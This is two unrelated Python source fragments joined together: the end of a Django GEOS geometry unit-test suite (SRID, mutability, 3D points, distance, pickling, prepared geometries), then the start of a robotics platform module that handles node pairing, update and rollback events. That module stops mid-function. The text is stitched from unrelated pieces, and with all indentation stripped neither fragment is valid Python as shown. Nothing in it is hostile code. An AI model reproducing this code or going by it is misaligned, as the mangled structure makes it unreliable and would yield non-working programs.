buf = g.buffer(g_tup[2], g_tup[3])
self.assertEqual(exp_buf.num_coords, buf.num_coords)
self.assertEqual(len(exp_buf), len(buf))
# Now assuring that each point in the buffer is almost equal
for j in xrange(len(exp_buf)):
exp_ring = exp_buf[j]
buf_ring = buf[j]
self.assertEqual(len(exp_ring), len(buf_ring))
for k in xrange(len(exp_ring)):
# Asserting the X, Y of each point are almost equal (due to floating point imprecision)
self.assertAlmostEqual(exp_ring[k][0], buf_ring[k][0], 9)
self.assertAlmostEqual(exp_ring[k][1], buf_ring[k][1], 9)
def test15_srid(self):
"Testing the SRID property and keyword."
# Testing SRID keyword on Point
pnt = Point(5, 23, srid=4326)
self.assertEqual(4326, pnt.srid)
pnt.srid = 3084
self.assertEqual(3084, pnt.srid)
self.assertRaises(ctypes.ArgumentError, pnt.set_srid, '4326')
# Testing SRID keyword on fromstr(), and on Polygon rings.
poly = fromstr(polygons[1].wkt, srid=4269)
self.assertEqual(4269, poly.srid)
for ring in poly: self.assertEqual(4269, ring.srid)
poly.srid = 4326
self.assertEqual(4326, poly.shell.srid)
# Testing SRID keyword on GeometryCollection
gc = GeometryCollection(Point(5, 23), LineString((0, 0), (1.5, 1.5), (3, 3)), srid=32021)
self.assertEqual(32021, gc.srid)
for i in range(len(gc)): self.assertEqual(32021, gc[i].srid)
# GEOS may get the SRID from HEXEWKB
# 'POINT(5 23)' at SRID=4326 in hex form -- obtained from PostGIS
# using `SELECT GeomFromText('POINT (5 23)', 4326);`.
hex = '0101000020E610000000000000000014400000000000003740'
p1 = fromstr(hex)
self.assertEqual(4326, p1.srid)
# In GEOS 3.0.0rc1-4 when the EWKB and/or HEXEWKB is exported,
# the SRID information is lost and set to -1 -- this is not a
# problem on the 3.0.0 version (another reason to upgrade).
exp_srid = self.null_srid
p2 = fromstr(p1.hex)
self.assertEqual(exp_srid, p2.srid)
p3 = fromstr(p1.hex, srid=-1) # -1 is intended.
self.assertEqual(-1, p3.srid)
def test16_mutable_geometries(self):
"Testing the mutability of Polygons and Geometry Collections."
### Testing the mutability of Polygons ###
for p in polygons:
poly = fromstr(p.wkt)
# Should only be able to use __setitem__ with LinearRing geometries.
self.assertRaises(TypeError, poly.__setitem__, 0, LineString((1, 1), (2, 2)))
# Constructing the new shell by adding 500 to every point in the old shell.
shell_tup = poly.shell.tuple
new_coords = []
for point in shell_tup: new_coords.append((point[0] + 500., point[1] + 500.))
new_shell = LinearRing(*tuple(new_coords))
# Assigning polygon's exterior ring w/the new shell
poly.exterior_ring = new_shell
s = str(new_shell) # new shell is still accessible
self.assertEqual(poly.exterior_ring, new_shell)
self.assertEqual(poly[0], new_shell)
### Testing the mutability of Geometry Collections
for tg in multipoints:
mp = fromstr(tg.wkt)
for i in range(len(mp)):
# Creating a random point.
pnt = mp[i]
new = Point(random.randint(1, 100), random.randint(1, 100))
# Testing the assignment
mp[i] = new
s = str(new) # what was used for the assignment is still accessible
self.assertEqual(mp[i], new)
self.assertEqual(mp[i].wkt, new.wkt)
self.assertNotEqual(pnt, mp[i])
# MultiPolygons involve much more memory management because each
# Polygon w/in the collection has its own rings.
for tg in multipolygons:
mpoly = fromstr(tg.wkt)
for i in xrange(len(mpoly)):
poly = mpoly[i]
old_poly = mpoly[i]
# Offsetting the each ring in the polygon by 500.
for j in xrange(len(poly)):
r = poly[j]
for k in xrange(len(r)): r[k] = (r[k][0] + 500., r[k][1] + 500.)
poly[j] = r
self.assertNotEqual(mpoly[i], poly)
# Testing the assignment
mpoly[i] = poly
s = str(poly) # Still accessible
self.assertEqual(mpoly[i], poly)
self.assertNotEqual(mpoly[i], old_poly)
# Extreme (!!) __setitem__ -- no longer works, have to detect
# in the first object that __setitem__ is called in the subsequent
# objects -- maybe mpoly[0, 0, 0] = (3.14, 2.71)?
#mpoly[0][0][0] = (3.14, 2.71)
#self.assertEqual((3.14, 2.71), mpoly[0][0][0])
# Doing it more slowly..
#self.assertEqual((3.14, 2.71), mpoly[0].shell[0])
#del mpoly
def test17_threed(self):
"Testing three-dimensional geometries."
# Testing a 3D Point
pnt = Point(2, 3, 8)
self.assertEqual((2.,3.,8.), pnt.coords)
self.assertRaises(TypeError, pnt.set_coords, (1.,2.))
pnt.coords = (1.,2.,3.)
self.assertEqual((1.,2.,3.), pnt.coords)
# Testing a 3D LineString
ls = LineString((2., 3., 8.), (50., 250., -117.))
self.assertEqual(((2.,3.,8.), (50.,250.,-117.)), ls.tuple)
self.assertRaises(TypeError, ls.__setitem__, 0, (1.,2.))
ls[0] = (1.,2.,3.)
self.assertEqual((1.,2.,3.), ls[0])
def test18_distance(self):
"Testing the distance() function."
# Distance to self should be 0.
pnt = Point(0, 0)
self.assertEqual(0.0, pnt.distance(Point(0, 0)))
# Distance should be 1
self.assertEqual(1.0, pnt.distance(Point(0, 1)))
# Distance should be ~ sqrt(2)
self.assertAlmostEqual(1.41421356237, pnt.distance(Point(1, 1)), 11)
# Distances are from the closest vertex in each geometry --
# should be 3 (distance from (2, 2) to (5, 2)).
ls1 = LineString((0, 0), (1, 1), (2, 2))
ls2 = LineString((5, 2), (6, 1), (7, 0))
self.assertEqual(3, ls1.distance(ls2))
def test19_length(self):
"Testing the length property."
# Points have 0 length.
pnt = Point(0, 0)
self.assertEqual(0.0, pnt.length)
# Should be ~ sqrt(2)
ls = LineString((0, 0), (1, 1))
self.assertAlmostEqual(1.41421356237, ls.length, 11)
# Should be circumfrence of Polygon
poly = Polygon(LinearRing((0, 0), (0, 1), (1, 1), (1, 0), (0, 0)))
self.assertEqual(4.0, poly.length)
# Should be sum of each element's length in collection.
mpoly = MultiPolygon(poly.clone(), poly)
self.assertEqual(8.0, mpoly.length)
def test20a_emptyCollections(self):
"Testing empty geometries and collections."
gc1 = GeometryCollection([])
gc2 = fromstr('GEOMETRYCOLLECTION EMPTY')
pnt = fromstr('POINT EMPTY')
ls = fromstr('LINESTRING EMPTY')
poly = fromstr('POLYGON EMPTY')
mls = fromstr('MULTILINESTRING EMPTY')
mpoly1 = fromstr('MULTIPOLYGON EMPTY')
mpoly2 = MultiPolygon(())
for g in [gc1, gc2, pnt, ls, poly, mls, mpoly1, mpoly2]:
self.assertEqual(True, g.empty)
# Testing len() and num_geom.
if isinstance(g, Polygon):
self.assertEqual(1, len(g)) # Has one empty linear ring
self.assertEqual(1, g.num_geom)
self.assertEqual(0, len(g[0]))
elif isinstance(g, (Point, LineString)):
self.assertEqual(1, g.num_geom)
self.assertEqual(0, len(g))
else:
self.assertEqual(0, g.num_geom)
self.assertEqual(0, len(g))
# Testing __getitem__ (doesn't work on Point or Polygon)
if isinstance(g, Point):
self.assertRaises(GEOSIndexError, g.get_x)
elif isinstance(g, Polygon):
lr = g.shell
self.assertEqual('LINEARRING EMPTY', lr.wkt)
self.assertEqual(0, len(lr))
self.assertEqual(True, lr.empty)
self.assertRaises(GEOSIndexError, lr.__getitem__, 0)
else:
self.assertRaises(GEOSIndexError, g.__getitem__, 0)
def test20b_collections_of_collections(self):
"Testing GeometryCollection handling of other collections."
# Creating a GeometryCollection WKT string composed of other
# collections and polygons.
coll = [mp.wkt for mp in multipolygons if mp.valid]
coll.extend([mls.wkt for mls in multilinestrings])
coll.extend([p.wkt for p in polygons])
coll.extend([mp.wkt for mp in multipoints])
gc_wkt = 'GEOMETRYCOLLECTION(%s)' % ','.join(coll)
# Should construct ok from WKT
gc1 = GEOSGeometry(gc_wkt)
# Should also construct ok from individual geometry arguments.
gc2 = GeometryCollection(*tuple(g for g in gc1))
# And, they should be equal.
self.assertEqual(gc1, gc2)
def test21_test_gdal(self):
"Testing `ogr` and `srs` properties."
if not gdal.HAS_GDAL: return
g1 = fromstr('POINT(5 23)')
self.assertEqual(True, isinstance(g1.ogr, gdal.OGRGeometry))
self.assertEqual(g1.srs, None)
g2 = fromstr('LINESTRING(0 0, 5 5, 23 23)', srid=4326)
self.assertEqual(True, isinstance(g2.ogr, gdal.OGRGeometry))
self.assertEqual(True, isinstance(g2.srs, gdal.SpatialReference))
self.assertEqual(g2.hex, g2.ogr.hex)
self.assertEqual('WGS 84', g2.srs.name)
def test22_copy(self):
"Testing use with the Python `copy` module."
import django.utils.copycompat as copy
poly = GEOSGeometry('POLYGON((0 0, 0 23, 23 23, 23 0, 0 0), (5 5, 5 10, 10 10, 10 5, 5 5))')
cpy1 = copy.copy(poly)
cpy2 = copy.deepcopy(poly)
self.assertNotEqual(poly._ptr, cpy1._ptr)
self.assertNotEqual(poly._ptr, cpy2._ptr)
def test23_transform(self):
"Testing `transform` method."
if not gdal.HAS_GDAL: return
orig = GEOSGeometry('POINT (-104.609 38.255)', 4326)
trans = GEOSGeometry('POINT (992385.4472045 481455.4944650)', 2774)
# Using a srid, a SpatialReference object, and a CoordTransform object
# for transformations.
t1, t2, t3 = orig.clone(), orig.clone(), orig.clone()
t1.transform(trans.srid)
t2.transform(gdal.SpatialReference('EPSG:2774'))
ct = gdal.CoordTransform(gdal.SpatialReference('WGS84'), gdal.SpatialReference(2774))
t3.transform(ct)
# Testing use of the `clone` keyword.
k1 = orig.clone()
k2 = k1.transform(trans.srid, clone=True)
self.assertEqual(k1, orig)
self.assertNotEqual(k1, k2)
prec = 3
for p in (t1, t2, t3, k2):
self.assertAlmostEqual(trans.x, p.x, prec)
self.assertAlmostEqual(trans.y, p.y, prec)
def test24_extent(self):
"Testing `extent` method."
# The xmin, ymin, xmax, ymax of the MultiPoint should be returned.
mp = MultiPoint(Point(5, 23), Point(0, 0), Point(10, 50))
self.assertEqual((0.0, 0.0, 10.0, 50.0), mp.extent)
pnt = Point(5.23, 17.8)
# Extent of points is just the point itself repeated.
self.assertEqual((5.23, 17.8, 5.23, 17.8), pnt.extent)
# Testing on the 'real world' Polygon.
poly = fromstr(polygons[3].wkt)
ring = poly.shell
x, y = ring.x, ring.y
xmin, ymin = min(x), min(y)
xmax, ymax = max(x), max(y)
self.assertEqual((xmin, ymin, xmax, ymax), poly.extent)
def test25_pickle(self):
"Testing pickling and unpickling support."
# Using both pickle and cPickle -- just 'cause.
import pickle, cPickle
# Creating a list of test geometries for pickling,
# and setting the SRID on some of them.
def get_geoms(lst, srid=None):
return [GEOSGeometry(tg.wkt, srid) for tg in lst]
tgeoms = get_geoms(points)
tgeoms.extend(get_geoms(multilinestrings, 4326))
tgeoms.extend(get_geoms(polygons, 3084))
tgeoms.extend(get_geoms(multipolygons, 900913))
# The SRID won't be exported in GEOS 3.0 release candidates.
no_srid = self.null_srid == -1
for geom in tgeoms:
s1, s2 = cPickle.dumps(geom), pickle.dumps(geom)
g1, g2 = cPickle.loads(s1), pickle.loads(s2)
for tmpg in (g1, g2):
self.assertEqual(geom, tmpg)
if not no_srid: self.assertEqual(geom.srid, tmpg.srid)
def test26_prepared(self):
"Testing PreparedGeometry support."
if not GEOS_PREPARE: return
# Creating a simple multipolygon and getting a prepared version.
mpoly = GEOSGeometry('MULTIPOLYGON(((0 0,0 5,5 5,5 0,0 0)),((5 5,5 10,10 10,10 5,5 5)))')
prep = mpoly.prepared
# A set of test points.
pnts = [Point(5, 5), Point(7.5, 7.5), Point(2.5, 7.5)]
covers = [True, True, False] # No `covers` op for regular GEOS geoms.
for pnt, c in zip(pnts, covers):
# Results should be the same (but faster)
self.assertEqual(mpoly.contains(pnt), prep.contains(pnt))
self.assertEqual(mpoly.intersects(pnt), prep.intersects(pnt))
self.assertEqual(c, prep.covers(pnt))
def test26_line_merge(self):
"Testing line merge support"
ref_geoms = (fromstr('LINESTRING(1 1, 1 1, 3 3)'),
fromstr('MULTILINESTRING((1 1, 3 3), (3 3, 4 2))'),
)
ref_merged = (fromstr('LINESTRING(1 1, 3 3)'),
fromstr('LINESTRING (1 1, 3 3, 4 2)'),
)
for geom, merged in zip(ref_geoms, ref_merged):
self.assertEqual(merged, geom.merged)
def suite():
s = unittest.TestSuite()
s.addTest(unittest.makeSuite(GEOSTest))
return s
def run(verbosity=2):
unittest.TextTestRunner(verbosity=verbosity).run(suite())
| |
__author__ = "Fabio Giuseppe Di Benedetto"
from rcmp_node import logging, RCMP_LOGGER_NAME, threading, RCMPlatformNode
from rcmp_inter_communication import RCMPInterCommunicationClient, RCMPMessage
PAIRING_EVENT = 'PGE'
UPDATE_EVENT = 'UE'
PAIRED_EVENT = 'PDE'
ROLLBACK_UPDATE_EVENT = 'RUE'
ROLLBACK_UPDATE_ALL_EVENT = 'RUAE'
# CLEAN_UP_EVENT = 'CUE'
STOP_WD_EVENT = 'SWE'
STOP_ALL_WD_EVENT = 'SAWE'
class RCMPEventAgent:
"""The generic agent that execute the event."""
I_ADDRESS_KEY = "i_address"
I_NAME_KEY = "i_name"
def __init__(self, pni):
self._logger = logging.getLogger(RCMP_LOGGER_NAME)
# this is for generic return messages
self._who = ""
self.pni = pni
# def call(self, params):
# """Call the internal server to notify an event to the RCM platform node instance specified in the request.
# Return True if the event reach the target."""
# c = RCMPInterCommunicationClient(address=self.pni[RCMPlatformNode.PNI_ADDRESS])
# try:
# c.connect()
# req = RCMPMessage(params)
# c.send(req.get_txt())
# res = c.receive()
# if res:
# result = RCMPMessage()
# result.set_content(res)
# return result.is_ok()
# else:
# self._logger.error("%s received no response" % req.get_txt())
# finally:
# c.close()
# # if we arrive here the call failed
# return False
def notify(self, params):
"""Notify an event to the RCM platform node instance specified in the request. Return an RCMPMessage."""
result = RCMPMessage()
self._logger.debug("event notify with params: %s" % params)
# the events are asynchronous so we don't need a timeout to wait the response
c = RCMPInterCommunicationClient(params[self.I_ADDRESS_KEY], t_out=2.0)
try:
c.connect()
# propagate the request as it is
c.send(RCMPMessage(params).get_txt())
# take the result of the operation
# res = c.receive()
res = c.receive_all_so_far()
if res:
result.set_content(res)
else:
reason = "No response received"
result.create_error_response(reason)
except Exception as e:
reason = "Error notifying the event to the RCM platform node at %s: %s" % (params[self.I_ADDRESS_KEY], e)
self._logger.error(reason)
result.create_error_response(reason)
finally:
try:
c.close()
except Exception as e:
# this exception doesn't change the result but we want to trace in the log
self._logger.warning("Error closing the notifying client: %s" % e)
return result
def execute(self, operation=None, params=None):
"""Execute the required operation with the parameters passed. Return an RCMPMessage."""
result = RCMPMessage()
if operation:
if params and self.I_ADDRESS_KEY in params and params[self.I_ADDRESS_KEY] and \
params[self.I_ADDRESS_KEY] != self.pni[RCMPlatformNode.PNI_ADDRESS]:
# perform the delegation to another platform node because the target
# is not the current one
result = self.notify(params)
else:
# perform the operation (the target is the current platform node)
result = operation(params)
return result
class PNodeInstance(RCMPEventAgent):
PI_NAME_KEY = "pi_name"
PI_ADDRESS_KEY = "pi_address"
PI_S_NAME_KEY = "pi_s_name"
PI_S_ADDRESS_KEY = "pi_s_address"
PI_R_NAME_KEY = "pi_r_name"
PI_R_ADDRESS_KEY = "pi_r_address"
PI_REACHABLE_KEY = "pi_reachable"
PI_SOURCE_ADDRESS_KEY = "pi_source_address"
def __init__(self, pni, wdm, msm):
RCMPEventAgent.__init__(self, pni)
self._who = "platform node instance"
self.wdm = wdm
self.msm = msm
def pairing(self, params):
"""Notify a platform node that has been selected to be a server for
another platform node of R type. params["pi_r_name"] and
params["pi_r_address"] are needed."""
result = self.execute(operation=self.target_on_pairing, params=params)
return result
def update(self, params):
"""Notify a platform node master that two platform nodes have been coupled.
params["pi_s_name"], params["pi_s_address"], params["pi_r_name"] and
params["pi_r_address"] are needed."""
result = self.execute(operation=self.target_on_update, params=params)
return result
def paired(self, params):
"""Notify the platform nodes that has been paired that the master know about that
and saved that connection. params["pi_name"] and params["pi_address"] are needed."""
result = self.execute(operation=self.target_on_paired, params=params)
return result
def rollback_update(self, params):
"""Notify a platform node master that two platform nodes have been uncoupled.
params["pi_s_name"], params["pi_s_address"], params["pi_r_name"],
params["pi_r_address"] and params["pi_reachable"] are needed."""
result = self.execute(operation=self.target_on_rollback_update, params=params)
return result
def rollback_update_all(self, params):
"""Notify a platform node master that all platform nodes have been uncoupled."""
result = self.execute(operation=self.target_on_rollback_update_all, params=params)
return result
def stop_wd(self, params):
"""Stop a watchdog. params["pi_name"] is needed."""
result = self.execute(operation=self.target_on_stop_wd, params=params)
return result
def stop_all_wd(self, params):
"""Stop all watchdogs."""
result = self.execute(operation=self.target_on_stop_all_wd, params=params)
return result
# --- PAIRING ---
def target_on_pairing(self, params):
# when a platform node target receives a pairing event means that it is paired
# to the platform node of type R that has sent him the event
# it has to notify the master about this situation so sends an update event
self.throw_update_event(params)
reason = "Pairing ack"
result = RCMPMessage()
result.create_ok_response(reason)
return result
def throw_update_event(self, params):
event = {RCMPEventHandler.EVENT_KEY: UPDATE_EVENT,
self.I_ADDRESS_KEY: self.pni[RCMPlatformNode.PNI_MASTER_NODE_IP]
if not self.pni[RCMPlatformNode.PNI_IS_MASTER] else self.pni[RCMPlatformNode.PNI_ADDRESS],
self.PI_S_NAME_KEY: self.pni[RCMPlatformNode.PNI_NAME],
self.PI_S_ADDRESS_KEY: self.pni[RCMPlatformNode.PNI_ADDRESS],
self.PI_R_NAME_KEY: params[self.PI_R_NAME_KEY],
self.PI_R_ADDRESS_KEY: params[self.PI_R_ADDRESS_KEY]}
self._logger.info("Throwing update event = %s" % event)
threading.Thread(target=self.update, args=(event, )).start()
# --- UPDATE ---
def target_on_update(self, params):
# when the master receives the update means that the connection between the 2 peers
# has accepted and we must finalize the flow saving this connection and starting
# the service logic associated with the robot in this connection
# the platform node target of an update is always the master
threading.Thread(target=self.execute_update, args=(params, )).start()
reason = "Update ack"
result = RCMPMessage()
result.create_ok_response(reason)
return result
def execute_update(self, params):
from rcmp_robotics_data import execute_int_robotics_data_query
if self.start_service_logic(params):
# if the service logic launch went well we have to save this binding
execute_int_robotics_data_query(self.create_conn, params,
"Unable to update the connection between %s and %s" %
(params[self.PI_S_NAME_KEY], params[self.PI_R_NAME_KEY]))
# now the master know about the connection between the two ends of the pair and has to throw
# a paired event to both
self.throw_paired_event(params)
def start_service_logic(self, params):
# TODO this operation must be atomic: check if the solution is ok
from rcmp_robotics_data import execute_int_robotics_data_query
result = True
ss_pi_type_target = execute_int_robotics_data_query(self.get_sl_ss_pi_type_target, params,
"Unable to get the service space target from "
"service logic of '%s'" % params[self.PI_R_NAME_KEY])
if ss_pi_type_target:
ssl_flow = []
self._logger.debug("-- TMP -- Update has to create the service space on %s" % ss_pi_type_target)
from rcmp_command import CREATE_SERVICE_SPACE, DELETE_SERVICE_SPACE, \
START_SERVICE_NODE, KILL_SERVICE_NODE, START_SERVICE_LAUNCHER, KILL_SERVICE_LAUNCHER, \
RCMPCommandHandler
from rcmp_service_command import ServiceSpace, ServiceNode, ServiceLauncher
s_space = ServiceSpace(self.pni, self.msm)
s_node = ServiceNode(self.pni, self.msm)
s_launcher = ServiceLauncher(self.pni, self.msm)
# the update starts the service logic associated with the platform
# node instance of type R at manual provisioning time
cmd = {RCMPCommandHandler.COMMAND_KEY: CREATE_SERVICE_SPACE,
ServiceSpace.I_NAME_KEY: params[self.PI_S_NAME_KEY] if ss_pi_type_target == RCMPlatformNode.S_TYPE
else params[self.PI_R_NAME_KEY], ServiceSpace.SS_NAME_KEY: params[self.PI_R_NAME_KEY]}
res = s_space.create(cmd)
result = res.is_ok()
if result:
# the service space creation went well so we can add it in ssl_flow
ssl_flow.append(cmd)
# once started the service space associated with the service logic
# we have to start all the remaining items of the service logic (nodes
# and launchers)
sl_items = execute_int_robotics_data_query(self.get_sl_sli, params,
"Unable to get the service logic items from "
"service logic of '%s'" % params[self.PI_R_NAME_KEY])
if sl_items:
for sli in sl_items:
if sli[0] and sli[1] and sli[2] and sli[3]:
# all this parameters are mandatory
# sli[0] is the name of the package for that item, sli[1] is the tag of the item
# representing the node type in case of node or the launcher name in case of launcher
# sli[2] is service_item type (node or launcher) and is used to know what type of
# service we have to launch
# sli[3] is service_logic_item si_pi_type_target (meaning where to launch
# the item and can be S or R)
cmd = {ServiceSpace.I_NAME_KEY: params[self.PI_S_NAME_KEY]
if sli[3] == RCMPlatformNode.S_TYPE else params[self.PI_R_NAME_KEY],
ServiceSpace.SS_NAME_KEY: params[self.PI_R_NAME_KEY]}
if sli[2] == ServiceSpace.SLI_N_TYPE:
# node
cmd[RCMPCommandHandler.COMMAND_KEY] = START_SERVICE_NODE
cmd[ServiceNode.SN_PACKAGE_KEY] = sli[0]
cmd[ServiceNode.SN_TYPE_KEY] = sli[1]
# the following are optional parameters: sli[4] is a name for the service item
# and sli[5] is a list of params to pass to the service
if sli[4]:
cmd[ServiceNode.SN_NAME_KEY] = sli[4]
if sli[5]:
cmd[ServiceNode.SN_PARAMS_KEY] = sli[5]
if sli[0] == ServiceNode.FIROS_PACKAGE and sli[1] == ServiceNode.FIROS_TYPE:
firos_connected_cb = False
try:
while not firos_connected_cb:
ss_ext_port = execute_int_robotics_data_query(self.get_ss_ext_port, cmd,
"Unable to get an inbound "
"free port for '%s' '%s' "
"from service logic of '%s'"
%
(sli[0], sli[1],
params[self.PI_R_NAME_KEY]))
if ss_ext_port:
res = s_node.start(cmd)
if not res.is_ok() and \
ServiceNode.FIROS_FAILURE in res.get_response_reason():
# only in case of FIROS_FAILURE we retry to launch firos
firos_connected_cb = False
else:
firos_connected_cb = True
# result is needed for appending the result in the rollback trace
result = res.is_ok()
else:
# no port found but not firos error so no more firos retry
firos_connected_cb = True
result = False
except Exception as e:
self._logger.error(e)
result = False
else:
# the custom case of rcm rcmdriver.py is different because need to be managed on the
# machine where we launch that node because has to check for a local free port
if sli[0] == "webrtc" and sli[1] == "webRTC_master.py":
cmd[ServiceNode.SN_PARAMS_KEY] = "%s r_name=%s" % \
(cmd[ServiceNode.SN_PARAMS_KEY],
params[self.PI_R_NAME_KEY]) \
if cmd[ServiceNode.SN_PARAMS_KEY] else "r_name=%s" % \
params[self.PI_R_NAME_KEY]
res = s_node.start(cmd)
result = res.is_ok()
elif sli[2] == ServiceSpace.SLI_L_TYPE:
# launcher
cmd[RCMPCommandHandler.COMMAND_KEY] = START_SERVICE_LAUNCHER
cmd[ServiceLauncher.SL_PACKAGE_KEY] = sli[0]
cmd[ServiceLauncher.SL_F_LAUNCHER_KEY] = sli[1]
# the following are optional parameters: sli[4] is a name for the service item
# and sli[5] is a list of params to pass to the service
if sli[4]:
cmd[ServiceLauncher.SL_NAME_KEY] = sli[4]
if sli[5]:
cmd[ServiceLauncher.SL_PARAMS_KEY] = sli[5]
res = s_launcher.start(cmd)
result = res.is_ok()
if result:
# the command went well so we add it in ssl_flow
ssl_flow.append(cmd)
else:
# we found and error so we exit from the loop without adding ssl_flow
# element
break
else:
# some mandatory parameter missing in the service logic
result = False
if not result:
# something went wrong so we have to rollback the service space creation
while len(ssl_flow) > 0:
# we pop (return the entry and delete from the list) from the last entry
# in the list that hold all the cmd went well before the error
cmd = ssl_flow.pop(-1)
if cmd[RCMPCommandHandler.COMMAND_KEY] == CREATE_SERVICE_SPACE:
cmd[RCMPCommandHandler.COMMAND_KEY] = DELETE_SERVICE_SPACE
s_space.delete(cmd)
elif cmd[RCMPCommandHandler.COMMAND_KEY] == START_SERVICE_NODE:
cmd[RCMPCommandHandler.COMMAND_KEY] = KILL_SERVICE_NODE
s_node.stop(cmd)
elif cmd[RCMPCommandHandler.COMMAND_KEY] == START_SERVICE_LAUNCHER:
cmd[RCMPCommandHandler.COMMAND_KEY] = KILL_SERVICE_LAUNCHER
s_launcher.stop(cmd)
self._logger.debug("-- TMP -- result: %s" % result)
return result
def get_ss_ext_port(self, rdm, params):
from rcmp_service_command import ServiceSpace
ss_ext_port = rdm.get_inbound_free_port(params[ServiceSpace.I_NAME_KEY], params[ServiceSpace.SS_NAME_KEY])
if not ss_ext_port:
reason = "All inbound ports in the range are already used"
raise IOError(reason)
params[ServiceSpace.SS_EXT_PORT_KEY] = ss_ext_port
rdm.update_used_inbound_port(params[ServiceSpace.SS_NAME_KEY], ss_ext_port)
return ss_ext_port
def get_sl_ss_pi_type_target(self, rdm, params):
row = rdm.get_sl_ss_pi_type_target_from_name(params[self.PI_R_NAME_KEY])
return row[0] if row and row[0] else None
def get_sl_sli(self, rdm, params):
return rdm.get_sli_from_connection_pi_r(params[self.PI_R_NAME_KEY])
def create_conn(self, rdm, params):
# TODO for now the name of the service space is the name of the robot
# in case of service logic without a target where to run the service space, we
# don't put any service space name
row = rdm.get_sl_ss_pi_type_target_from_name(params[self.PI_R_NAME_KEY])
rdm.insert_connection(params[self.PI_S_NAME_KEY], params[self.PI_R_NAME_KEY],
params[self.PI_R_NAME_KEY] if row and row[0] else None)
def throw_paired_event(self, params):
# the paired event is sent to both the peer in the connection
event_s = {RCMPEventHandler.EVENT_KEY: PAIRED_EVENT, self.I_ADDRESS_KEY: params[self.PI_S_ADDRESS_KEY],
self.PI_NAME_KEY: params[self.PI_R_NAME_KEY], self.PI_ADDRESS_KEY: params[self.PI_R_ADDRESS_KEY]}
self._logger.info("Throwing paired event = %s" % event_s)
# threading.Thread(target=self.notify, args=(event_s, )).start()
threading.Thread(target=self.paired, args=(event_s, )).start()
event_r = {RCMPEventHandler.EVENT_KEY: PAIRED_EVENT, self.I_ADDRESS_KEY: params[self.PI_R_ADDRESS_KEY],
self.PI_NAME_KEY: params[self.PI_S_NAME_KEY], self.PI_ADDRESS_KEY: params[self.PI_S_ADDRESS_KEY]}
self._logger.info("Throwing paired event = %s" % event_r)
threading.Thread(target=self.paired, args=(event_r, )).start()
# --- PAIRED ---
def target_on_paired(self, params):
# when a platform node target receives a paired event means that the master received
# the update event notifying that the two peers agreed in pairing each other; the
# connections table in robotics data on the master is updated and the service logic
# has been started
# on local we have to launch the watchdog to monitor the other peer
# connection
self._logger.debug("Executing paired")
self.wdm.add_watchdog(params)
self.wdm.get_watchdog(params).start()
reason = "Paired ack"
result = RCMPMessage()
result.create_ok_response(reason)
if not self.pni[RCMPlatformNode.PNI_IS_MASTER]:
# the paired event arrived so the RCMPlatformNode doesn't need to directly ping
# the master to know if it is on the platform
# TODO the write at this level means that maybe we have to synchronize pni
self.pni[RCMPlatformNode.PNI_STATE] = RCMPlatformNode.PAIRED_STATE
return result
# --- ROLLBACK UPDATE ---
def target_on_rollback_update(self, params):
# the platform node target of an update is always the master
threading.Thread(target=self.execute_rollback_update, args=(params, )).start()
reason = "Rollback update ack"
result = RCMPMessage()
result.create_ok_response(reason)
return result
def execute_rollback_update(self, params):
from rcmp_robotics_data import execute_int_robotics_data_query
self._logger.debug("Executing rollback update with params: %s" % params)
conns = execute_int_robotics_data_query(self.get_conn, params,
"Unable to get the connections from '%s'" %
params[self.PI_R_NAME_KEY] if self.PI_R_NAME_KEY in params
else params[self.PI_S_NAME_KEY])
self._logger.debug("-- TMP -- conns: %s" % conns)
if conns:
from rcmp_service_command import ServiceSpace, ServiceNode, ServiceLauncher
s_space = ServiceSpace(self.pni, self.msm)
s_node = ServiceNode(self.pni, self.msm)
s_launcher = ServiceLauncher(self.pni, self.msm)
if isinstance(conns, list):
# starting from a server we have a list of tuples
for conn in conns:
params[self.PI_R_NAME_KEY] = conn[0]
self.rollback_update_conn(params, s_space, s_node, s_launcher)
else:
# starting from a robot we have only one tuple
params[self.PI_S_NAME_KEY] = conns[0]
self.rollback_update_conn(params, s_space, s_node, s_launcher)
def rollback_update_conn(self, params, s_space, s_node, s_launcher):
from rcmp_robotics_data import execute_int_robotics_data_query
self.stop_service_logic(params, s_space, s_node, s_launcher)
self._logger.debug("-- TMP -- Service logic stopped")
# in every case we have to cancel the connection and the peer that results unreachable
execute_int_robotics_data_query(self.delete_conn, params,
"Unable to delete the connection between %s and %s" %
(params[self.PI_S_NAME_KEY], params[self.PI_R_NAME_KEY]))
self._logger.debug("-- TMP -- Connection deleted")
# the following must be done to clean up all there is relative to the platform node instance
# that results disconnected (and is not strictly related with the service logic)
self.clean_up(params, s_space)
self._logger.debug("-- TMP -- After clean_up")
def stop_service_logic(self, params, s_space, s_node, s_launcher):
from rcmp_robotics_data import execute_int_robotics_data_query
# TODO this operation must be atomic: in case of failure all has to come back as before
ss_name = execute_int_robotics_data_query(self.get_ss_name_from_conn, params,
"Unable to get ss_name from the connection '%s' - '%s'" %
(params[self.PI_R_NAME_KEY], params[self.PI_S_NAME_KEY]))
self._logger.debug("-- TMP -- Stopping service logic using params: %s and ss_name: %s" % (params, ss_name))
if ss_name:
sl_items = execute_int_robotics_data_query(self.get_sl_sli, params,
"Unable to get the service logic items from "
"service logic of '%s'" % params[self.PI_R_NAME_KEY])
from rcmp_command import DELETE_SERVICE_SPACE, KILL_SERVICE_NODE, KILL_SERVICE_LAUNCHER, RCMPCommandHandler
from rcmp_service_command import ServiceSpace, ServiceNode, ServiceLauncher
if sl_items:
for sli in sl_items:
if sli[3]:
# sli[0] is the name of the package for that item, sli[1] is the tag of the item
# representing the node type in case of node or the launcher name in case of launcher
# sli[2] is service_item type (node or launcher) and is used to know what type of
# service we have to kill
# sli[3] is service_logic_item si_pi_type_target (meaning where the item was launched
# and can be S or R)
cmd = {ServiceSpace.I_NAME_KEY: params[self.PI_S_NAME_KEY] if sli[3] == RCMPlatformNode.S_TYPE
else params[self.PI_R_NAME_KEY], ServiceSpace.SS_NAME_KEY: ss_name}
if sli[2] == ServiceSpace.SLI_N_TYPE:
# node
cmd[RCMPCommandHandler.COMMAND_KEY] = KILL_SERVICE_NODE
# sli[4] is a name for the service item
if sli[4]:
cmd[ServiceNode.SN_NAME_KEY] = sli[4]
else:
cmd[ServiceNode.SN_PACKAGE_KEY] = sli[0]
cmd[ServiceNode.SN_TYPE_KEY] = sli[1]
s_node.stop(cmd)
elif sli[2] == ServiceSpace.SLI_L_TYPE:
# launcher
cmd[RCMPCommandHandler.COMMAND_KEY] = KILL_SERVICE_LAUNCHER
# sli[4] is a name for the service item
if sli[4]:
cmd[ServiceLauncher.SL_NAME_KEY] = sli[4]
